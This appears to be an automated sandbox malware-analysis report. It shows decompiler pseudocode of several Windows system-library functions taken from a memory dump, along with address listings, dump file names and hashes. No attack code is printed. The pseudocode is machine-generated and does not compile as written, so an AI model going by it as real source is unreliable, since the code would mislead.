                                                                                                                                                    0x00000000
                                                                                                                                                    0x0319744c
                                                                                                                                                    0x03197443
                                                                                                                                                    0x0319750e
                                                                                                                                                    0x03197514
                                                                                                                                                    0x03197514
                                                                                                                                                    0x03197455
                                                                                                                                                    0x03197469
                                                                                                                                                    0x0319746d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03197473
                                                                                                                                                    0x03197473
                                                                                                                                                    0x03197476
                                                                                                                                                    0x03197480
                                                                                                                                                    0x03197484
                                                                                                                                                    0x0319748e
                                                                                                                                                    0x03197493
                                                                                                                                                    0x03197493
                                                                                                                                                    0x03197496
                                                                                                                                                    0x03197499
                                                                                                                                                    0x031974a1
                                                                                                                                                    0x031974b1
                                                                                                                                                    0x031974b5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031974bb
                                                                                                                                                    0x031974c1
                                                                                                                                                    0x031974c1
                                                                                                                                                    0x031974c4
                                                                                                                                                    0x031974c5
                                                                                                                                                    0x031974c6
                                                                                                                                                    0x031974c7
                                                                                                                                                    0x031974c8
                                                                                                                                                    0x031974cd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031974d3
                                                                                                                                                    0x031974d3
                                                                                                                                                    0x031974d6
                                                                                                                                                    0x031974d8
                                                                                                                                                    0x031974db
                                                                                                                                                    0x031974dd
                                                                                                                                                    0x031974e0
                                                                                                                                                    0x031974e7
                                                                                                                                                    0x031974ee
                                                                                                                                                    0x031974ee
                                                                                                                                                    0x031974f4
                                                                                                                                                    0x031974f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031974fb
                                                                                                                                                    0x031974fb
                                                                                                                                                    0x031974fd
                                                                                                                                                    0x03197500
                                                                                                                                                    0x03197503
                                                                                                                                                    0x03197505
                                                                                                                                                    0x03197505
                                                                                                                                                    0x031974f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031974cd
                                                                                                                                                    0x031974b5
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                                    • Instruction ID: ea47fe9c520f2ee5ed163239113d3534ca1d3cbb70bd7ced05e319def3e2b856
                                                                                                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                                                    • Instruction Fuzzy Hash: 59515C71600606EFEB55CF14D480A96BBB5FF49304F1981AAE9089F262E371E986CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F2990, Relevance: .1, Instructions: 133COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E030F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x319ff00);
				E0311D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x30a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0310E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x30a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E031451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x30a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E030F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E030D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E030F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E030DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E030F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E030F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E030F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0311D0D1(_t62);
				goto L28;
			}





















                                                                                                                                                    0x030f2990
                                                                                                                                                    0x030f2992
                                                                                                                                                    0x030f2997
                                                                                                                                                    0x030f29a3
                                                                                                                                                    0x030f29a6
                                                                                                                                                    0x030f29ab
                                                                                                                                                    0x030f29ad
                                                                                                                                                    0x030f29b2
                                                                                                                                                    0x03135c80
                                                                                                                                                    0x030f29b8
                                                                                                                                                    0x030f29b8
                                                                                                                                                    0x030f29bb
                                                                                                                                                    0x030f29c0
                                                                                                                                                    0x030f29c5
                                                                                                                                                    0x030f29c6
                                                                                                                                                    0x030f29c6
                                                                                                                                                    0x030f29cb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29cd
                                                                                                                                                    0x030f29d0
                                                                                                                                                    0x030f29d9
                                                                                                                                                    0x030f29db
                                                                                                                                                    0x030f29dd
                                                                                                                                                    0x030f2a7f
                                                                                                                                                    0x030f2a84
                                                                                                                                                    0x030f2a87
                                                                                                                                                    0x030f2a89
                                                                                                                                                    0x03135ca1
                                                                                                                                                    0x03135ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a8f
                                                                                                                                                    0x030f2a8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x030f29dd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29db
                                                                                                                                                    0x030f29e6
                                                                                                                                                    0x030f29e9
                                                                                                                                                    0x030f29eb
                                                                                                                                                    0x030f29ed
                                                                                                                                                    0x030f29f3
                                                                                                                                                    0x030f29f5
                                                                                                                                                    0x030f29f8
                                                                                                                                                    0x030f29fa
                                                                                                                                                    0x030f2a97
                                                                                                                                                    0x030f2a9a
                                                                                                                                                    0x030f2a9d
                                                                                                                                                    0x030f2add
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a9f
                                                                                                                                                    0x030f2aa2
                                                                                                                                                    0x030f2aa5
                                                                                                                                                    0x030f2aa8
                                                                                                                                                    0x030f2aab
                                                                                                                                                    0x03135cab
                                                                                                                                                    0x03135caf
                                                                                                                                                    0x03135cc5
                                                                                                                                                    0x03135cda
                                                                                                                                                    0x03135cdc
                                                                                                                                                    0x03135cdf
                                                                                                                                                    0x03135ce5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135ceb
                                                                                                                                                    0x03135ced
                                                                                                                                                    0x03135cee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135cee
                                                                                                                                                    0x03135cb1
                                                                                                                                                    0x03135cb4
                                                                                                                                                    0x03135cb9
                                                                                                                                                    0x03135cbb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135cbd
                                                                                                                                                    0x03135cbd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135cbd
                                                                                                                                                    0x03135cbb
                                                                                                                                                    0x030f2ab1
                                                                                                                                                    0x030f2ab1
                                                                                                                                                    0x030f2ac4
                                                                                                                                                    0x030f2ac6
                                                                                                                                                    0x030f2ac6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2ac6
                                                                                                                                                    0x030f2aab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a00
                                                                                                                                                    0x030f2a09
                                                                                                                                                    0x030f2a0e
                                                                                                                                                    0x030f2a21
                                                                                                                                                    0x030f2a24
                                                                                                                                                    0x030f2a35
                                                                                                                                                    0x030f2a3a
                                                                                                                                                    0x030f2a3d
                                                                                                                                                    0x030f2a42
                                                                                                                                                    0x030f2a59
                                                                                                                                                    0x030f2a59
                                                                                                                                                    0x030f2a5c
                                                                                                                                                    0x030f2a5f
                                                                                                                                                    0x030f2a5f
                                                                                                                                                    0x030f29fa
                                                                                                                                                    0x030f29f3
                                                                                                                                                    0x030f2a64
                                                                                                                                                    0x030f2a64
                                                                                                                                                    0x030f2a6b
                                                                                                                                                    0x030f2a6b
                                                                                                                                                    0x030f2a6d
                                                                                                                                                    0x030f2a72
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cc93e05277f0635c9d2b897ed3fc93816fbfbb62b8aec8f201fc9d42e64b6831
                                                                                                                                                    • Instruction ID: 9540c9ad10fa82d474a3cfb401e76f9ecc5969aaa7f06e9322bf6b911f6eccc0
                                                                                                                                                    • Opcode Fuzzy Hash: cc93e05277f0635c9d2b897ed3fc93816fbfbb62b8aec8f201fc9d42e64b6831
                                                                                                                                                    • Instruction Fuzzy Hash: FC517A79901209DFCF25CF55C880ADEBBBABF4C714F098965EA10AB660C3359952CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F4BAD, Relevance: .1, Instructions: 131COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E030F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x31bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E030CCC50(_t86);
					L11:
					return E0310B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x31b8504
				E030E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0310FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0310B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L030E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E030CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x31b8504
								E030DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E030F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                                                                    0x030f4bad
                                                                                                                                                    0x030f4bbf
                                                                                                                                                    0x030f4bc2
                                                                                                                                                    0x030f4bc6
                                                                                                                                                    0x030f4bcd
                                                                                                                                                    0x030f4bd9
                                                                                                                                                    0x031367fe
                                                                                                                                                    0x03136800
                                                                                                                                                    0x030f4ccc
                                                                                                                                                    0x030f4ccd
                                                                                                                                                    0x030f4cb7
                                                                                                                                                    0x030f4cc9
                                                                                                                                                    0x030f4cc9
                                                                                                                                                    0x030f4bdf
                                                                                                                                                    0x030f4be5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4beb
                                                                                                                                                    0x030f4bef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4bf5
                                                                                                                                                    0x030f4bf9
                                                                                                                                                    0x030f4c06
                                                                                                                                                    0x030f4c0b
                                                                                                                                                    0x030f4c17
                                                                                                                                                    0x030f4c1c
                                                                                                                                                    0x030f4c1f
                                                                                                                                                    0x030f4c25
                                                                                                                                                    0x030f4c33
                                                                                                                                                    0x030f4c3d
                                                                                                                                                    0x030f4c40
                                                                                                                                                    0x030f4c43
                                                                                                                                                    0x030f4c47
                                                                                                                                                    0x030f4c4d
                                                                                                                                                    0x030f4c53
                                                                                                                                                    0x030f4c54
                                                                                                                                                    0x030f4c55
                                                                                                                                                    0x030f4c56
                                                                                                                                                    0x030f4c5b
                                                                                                                                                    0x030f4c5c
                                                                                                                                                    0x030f4c63
                                                                                                                                                    0x030f4c6b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136776
                                                                                                                                                    0x03136784
                                                                                                                                                    0x03136784
                                                                                                                                                    0x0313679f
                                                                                                                                                    0x031367a7
                                                                                                                                                    0x031367af
                                                                                                                                                    0x031367ce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031367b1
                                                                                                                                                    0x031367b7
                                                                                                                                                    0x031367b8
                                                                                                                                                    0x031367c1
                                                                                                                                                    0x031367d3
                                                                                                                                                    0x031367d9
                                                                                                                                                    0x031367dd
                                                                                                                                                    0x030f4c94
                                                                                                                                                    0x030f4c94
                                                                                                                                                    0x030f4c98
                                                                                                                                                    0x030f4c9c
                                                                                                                                                    0x030f4ca3
                                                                                                                                                    0x031367f4
                                                                                                                                                    0x031367f4
                                                                                                                                                    0x030f4cb5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4cb5
                                                                                                                                                    0x030f4c79
                                                                                                                                                    0x030f4c7e
                                                                                                                                                    0x030f4c89
                                                                                                                                                    0x030f4c8b
                                                                                                                                                    0x030f4c8f
                                                                                                                                                    0x030f4c8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4c89
                                                                                                                                                    0x031367c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031367c3
                                                                                                                                                    0x031367af
                                                                                                                                                    0x030f4c73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 314f927dc31e5bfa7972de87ee926d76501b04cdd8bb9bf570041fad9bf20009
                                                                                                                                                    • Instruction ID: d2f178428b43741a853c965670d5f861b07eb4cab9acdab344f89c3cd3e0db06
                                                                                                                                                    • Opcode Fuzzy Hash: 314f927dc31e5bfa7972de87ee926d76501b04cdd8bb9bf570041fad9bf20009
                                                                                                                                                    • Instruction Fuzzy Hash: F541B635A01228AFCB60DF65C980FEEB7B8EF49710F4504A5E908AF250DB74DE85CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F4D3B, Relevance: .1, Instructions: 131COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E030F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x31bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0310FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x31b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0310B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L030E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E030CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0310B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0310F380(_t67 + 0xc, 0x30a5138, 0x10) == 0) {
								 *0x31b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E030F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E030F4E70(0x31b86b0, 0x30f5690, 0, 0) != 0) {
					_t46 = E030CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                                                                    0x030f4d3b
                                                                                                                                                    0x030f4d4d
                                                                                                                                                    0x030f4d53
                                                                                                                                                    0x030f4d58
                                                                                                                                                    0x030f4d65
                                                                                                                                                    0x030f4d6c
                                                                                                                                                    0x030f4d71
                                                                                                                                                    0x030f4d77
                                                                                                                                                    0x030f4d7f
                                                                                                                                                    0x030f4d8c
                                                                                                                                                    0x030f4d8e
                                                                                                                                                    0x030f4dad
                                                                                                                                                    0x030f4db0
                                                                                                                                                    0x030f4db7
                                                                                                                                                    0x030f4db8
                                                                                                                                                    0x030f4db9
                                                                                                                                                    0x030f4dba
                                                                                                                                                    0x030f4dbb
                                                                                                                                                    0x030f4dc1
                                                                                                                                                    0x030f4dc8
                                                                                                                                                    0x030f4dcc
                                                                                                                                                    0x030f4dd5
                                                                                                                                                    0x030f4dde
                                                                                                                                                    0x030f4ddf
                                                                                                                                                    0x030f4de0
                                                                                                                                                    0x030f4de1
                                                                                                                                                    0x030f4de6
                                                                                                                                                    0x030f4de7
                                                                                                                                                    0x030f4de9
                                                                                                                                                    0x030f4df3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136c7c
                                                                                                                                                    0x03136c8a
                                                                                                                                                    0x03136c8a
                                                                                                                                                    0x03136c9d
                                                                                                                                                    0x03136ca7
                                                                                                                                                    0x03136cac
                                                                                                                                                    0x03136cb2
                                                                                                                                                    0x03136cb9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136cbf
                                                                                                                                                    0x03136cbf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03136cbf
                                                                                                                                                    0x03136cb9
                                                                                                                                                    0x030f4dfb
                                                                                                                                                    0x03136ccf
                                                                                                                                                    0x03136cd3
                                                                                                                                                    0x030f4e32
                                                                                                                                                    0x030f4e39
                                                                                                                                                    0x03136ce0
                                                                                                                                                    0x03136cf2
                                                                                                                                                    0x03136cf2
                                                                                                                                                    0x03136ce0
                                                                                                                                                    0x030f4e3f
                                                                                                                                                    0x030f4e41
                                                                                                                                                    0x030f4e51
                                                                                                                                                    0x030f4e51
                                                                                                                                                    0x030f4e03
                                                                                                                                                    0x030f4e03
                                                                                                                                                    0x030f4e09
                                                                                                                                                    0x030f4e0f
                                                                                                                                                    0x030f4e57
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4e1b
                                                                                                                                                    0x030f4e30
                                                                                                                                                    0x030f4e5b
                                                                                                                                                    0x030f4e5b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4e30
                                                                                                                                                    0x030f4e11
                                                                                                                                                    0x030f4e11
                                                                                                                                                    0x030f4e16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4e16
                                                                                                                                                    0x030f4e01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4e01
                                                                                                                                                    0x030f4da5
                                                                                                                                                    0x03136c6b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4dab
                                                                                                                                                    0x030f4dab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f4dab

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2ea98054e16c0e2470af668413c840cf03dc848526f80e353d38d77ee3cf3403
                                                                                                                                                    • Instruction ID: 9e73182fb147af30e9c8b35396d6fa704a1b9f60d1815b6487fccd5a96e7ade2
                                                                                                                                                    • Opcode Fuzzy Hash: 2ea98054e16c0e2470af668413c840cf03dc848526f80e353d38d77ee3cf3403
                                                                                                                                                    • Instruction Fuzzy Hash: 52412575A01318AFEB31DF15CC80FABB7A9EF49614F040099EE499B680D7B4DD44CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D8A0A, Relevance: .1, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E030D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x31bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0310B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E030DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x30a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E030F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03103C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
